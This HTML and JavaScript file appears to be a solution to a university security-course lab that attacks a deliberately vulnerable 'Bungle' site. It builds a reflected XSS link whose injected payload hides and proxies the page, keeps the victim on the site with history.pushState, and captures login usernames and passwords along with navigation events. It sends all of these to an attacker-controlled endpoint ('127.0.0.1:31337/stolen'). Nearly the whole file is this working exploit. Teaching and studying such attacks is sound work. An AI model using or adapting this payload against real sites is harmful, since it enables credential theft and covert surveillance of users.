<meta charset="utf-8"><script src="http://ajax.googleapis.com/ajax/libs/jquery

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4.  
5. $(document).ready(function() {
6. var url = makeLink(xssdefense, target, attacker);
7. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
8. });
9. function payload(attacker, target) {
10. function log(data) {
11. console.log($.param(data))
12. $.get(attacker, data);
13. }
14. function login(username, userpass, href) {
15. $("html").load(href, {username: username, password:userpass}, function(){
16. var url = target;
17. history.pushState({state:"login"}, '', url);
18. $(".btn").attr("type", "button"); // clear submit
19. log({event: "login", user: username, pass: userpass});
20. log({event: "nav", user: username, url:url});
21. $(".btn").mousedown(function(e){
22. if(e.which === 1){
23. switch($(this).attr("id")) {
24. case "log-out-btn":
25. logout(username);
26. break;
27. case "search-btn":
28. search($("#query").val(), username);
29. break;
30. }
31. }
32. });
33. });
34. }
35. function logout(username) {
36. $("html").load("./logout",{username: username}, function(){
37. var url = target
38. history.pushState({state:"logout"}, '', url);
39. $(".btn").attr("type", "button"); // clear submit
40. log({event: "logout", user: username});
41. log({event: "nav", url:url});
42. $(".btn").mousedown(function(e){
43. if(e.which === 1){
44. switch($(this).attr("id")) {
45. case "log-in-btn":
46. login($("#username").val(), $("#userpass").val(), "./login");
47. break;
48. case "new-account-btn":
49. login($("#username").val(), $("#userpass").val(), "./create");
50. break;
51. case "search-btn":
52. search($("#query").val(), "");
53. break;
54. }
55. }
56. });
57. });
58. }
59. function search(q, username) {
60. $("html").load("./search", function(){
61. $(".btn").attr("type", "button"); // clear submit
62. $("#search-again-btn").removeAttr("href"); // remove link
63. var url = target + "./search?q=" + q;
64. history.pushState({state: "search"}, '', url);
65. if(username === "") {log({event: "nav", url:url});}
66. else {
67. log({event: "nav", user: username, url:url});
68. //TODO: hide script in search history
69. }
70. $(".btn").mousedown(function(e){
71. if(e.which === 1){
72. switch($(this).attr("id")) {
73. case "log-out-btn":
74. logout(username);
75. break;
76. case "search-again-btn":
77. proxy("./");
78. break;
79. }
80. }
81. });
82. });
83. }
84. function proxy(href) {
85. $("html").load(href, function(){
86. $("html").show();
87. $(".btn").attr("type", "button"); // clear submit
88. var username = $("#logged-in-user").text();
89. var url = target;
90. history.pushState({}, '', url);
91. if(username == ""){
92. log({event: "nav", url: url});
93. }
94. else {
95. log({event: "nav", user:username, url: url});
96. }
97. // Different button cases
98. $(".btn").mousedown(function(e){
99. if(e.which === 1){
100. switch($(this).attr("id")) {
101. case "log-in-btn":
102. login($("#username").val(), $("#userpass").val(), "./login");
103. break;
104. case "new-account-btn":
105. login($("#username").val(), $("#userpass").val(), "./create");
106. break;
107. case "log-out-btn":
108. logout(username);
109. break;
110. case "search-btn":
111. search($("#query").val(), "");
112. break;
113. }
114. }
115. });
116. });
117. }
118. $("html").hide();
119. proxy("./");
120. }
121. function makeLink(xssdefense, target, attacker) {
122. if (xssdefense == 0) {
123. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
124. encodeURIComponent("<script" + ">" + payload.toString() +
125. ";payload(\"" + attacker + "\"," + "\"" + target + "\" );</script" + ">");
126. }
127. }
128. var xssdefense = 0;
129. var target = "http://bungle-cs461.cs.illinois.edu/";
130. var attacker = "http://127.0.0.1:31337/stolen";
131. </script>
132.  
133. <h3>Hello</h3>